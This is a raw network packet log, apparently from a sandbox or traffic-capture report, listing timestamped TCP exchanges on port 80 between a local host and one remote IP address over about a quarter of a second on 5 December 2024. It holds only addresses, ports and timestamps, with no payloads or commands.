Dec 5, 2024 21:50:12.842031956 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.842148066 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.842230082 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.842489004 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.845985889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.846098900 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.846155882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.846155882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.849385977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.849490881 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.849515915 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.850584984 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.852746964 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.852838993 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.852870941 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.853008032 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.856087923 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.856180906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.856511116 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.856565952 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.859349012 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.859437943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.859518051 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.859644890 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.861485004 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.861536980 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.861624956 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.861788988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.863704920 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.863812923 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.863831043 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.863922119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.865859032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.865922928 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.865946054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.866097927 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.868069887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.868156910 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.884965897 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.885010004 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.885036945 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.885210991 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.886017084 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.886176109 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.886199951 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.886271954 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.888153076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.888216019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.888303995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.888384104 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.890283108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.890340090 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.890346050 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.890396118 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.892430067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.892478943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.892608881 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.892879963 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.894660950 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.894716024 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.894737959 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.895889997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.896693945 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.896737099 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.896760941 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.896991014 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.898833036 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.898929119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.899034977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.899241924 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.900966883 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.901093006 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.901118040 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.901139021 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.903094053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.903140068 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.903207064 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.903368950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.905200005 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.905253887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.905275106 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.905340910 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.907254934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.907392025 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.907418966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.907571077 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.909487009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.909501076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.909706116 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.911420107 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.911469936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.911493063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.911674023 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.913842916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.913856983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.913976908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.915535927 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.915631056 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.915654898 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.915792942 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.917599916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.917783976 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.917960882 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.918133020 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.919667959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.919730902 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.919756889 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.919857025 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.922017097 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.922125101 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.922148943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.922228098 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.923810959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.923891068 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.923923016 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.924012899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.925862074 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.925946951 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.925972939 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.926069975 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.928019047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.928034067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.928082943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.928082943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.930047035 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.930063963 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.930110931 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.930110931 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.932104111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.932204008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.932228088 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.932326078 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.934171915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.934247971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.934273958 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.934395075 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.936289072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.936326981 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.936621904 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.938297987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.938355923 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.938389063 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.938479900 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.940386057 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.940444946 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.940540075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.940659046 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.942424059 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.942550898 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.942552090 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.942658901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.944530010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.944632053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.944642067 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.944828987 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.946579933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.946672916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.946697950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.946784019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.955995083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.956114054 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.956135988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.956859112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.956960917 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.956985950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.957118988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.958946943 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.959053993 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.959084034 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.960320950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.961010933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.961093903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.961147070 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.963186979 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.963202000 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.963306904 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.965148926 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.965221882 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.965305090 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.967154026 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.967271090 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.967304945 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.967474937 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.969134092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.969274044 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.969562054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.971123934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.971252918 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.971276999 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.972987890 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.973015070 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.973217010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.974972963 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.974997997 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.975002050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.975474119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.976856947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.976984978 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.977098942 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.978791952 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.978884935 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.979207039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.980582952 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.980688095 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.980887890 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.982517958 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.982629061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.982635975 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.982785940 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.984323978 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.984416008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.984690905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.986124039 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.986192942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.986213923 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.986244917 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.987886906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.987999916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.988010883 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.988094091 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.989737034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.989792109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.989841938 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.989927053 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.991436958 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.991520882 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.991542101 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.991646051 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.993263960 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.993279934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.993328094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.993328094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.995016098 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.995147943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.995192051 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.995280027 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.996788979 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.996848106 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.996872902 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.998558998 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.998661995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:12.998677969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:12.998764038 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.000303984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.000382900 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.000407934 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.000550032 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.077044010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.077104092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.077173948 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.077658892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.077856064 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.077860117 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.077944994 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.078829050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.078943014 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.079258919 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.079349995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.079730988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.080475092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.080667019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.080693960 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.080760002 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.081655025 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.081697941 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.081721067 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.081764936 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.082792997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.082943916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.083070040 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.083940029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.084043026 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.084357023 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.085062027 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.085148096 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.085170984 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.086025953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.086102962 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.086127996 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.086168051 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.086975098 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.087105989 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.087110043 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.087179899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.087949038 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.088046074 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.088058949 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.088089943 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.088916063 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.089032888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.089036942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.089193106 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.089819908 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.089946985 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.089970112 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.090827942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.090966940 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.090990067 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.091253996 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.091778040 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.091835022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.091859102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.092194080 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.092698097 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.092808008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.092830896 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.093619108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.093667984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.093688011 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.093748093 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.094587088 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.094629049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.094679117 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.094679117 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.095511913 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.095654011 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.095676899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.095930099 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.096651077 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.096781015 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.096951962 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.097352028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.097465992 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.097489119 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.098298073 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.098404884 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.098414898 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.099242926 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.099416018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.099427938 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.099672079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.100162029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.100274086 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.100461960 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.101088047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.101243973 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.101265907 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.101969957 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.102067947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.102082968 CET	49710	80	192.168.2.5	45.130.41.93
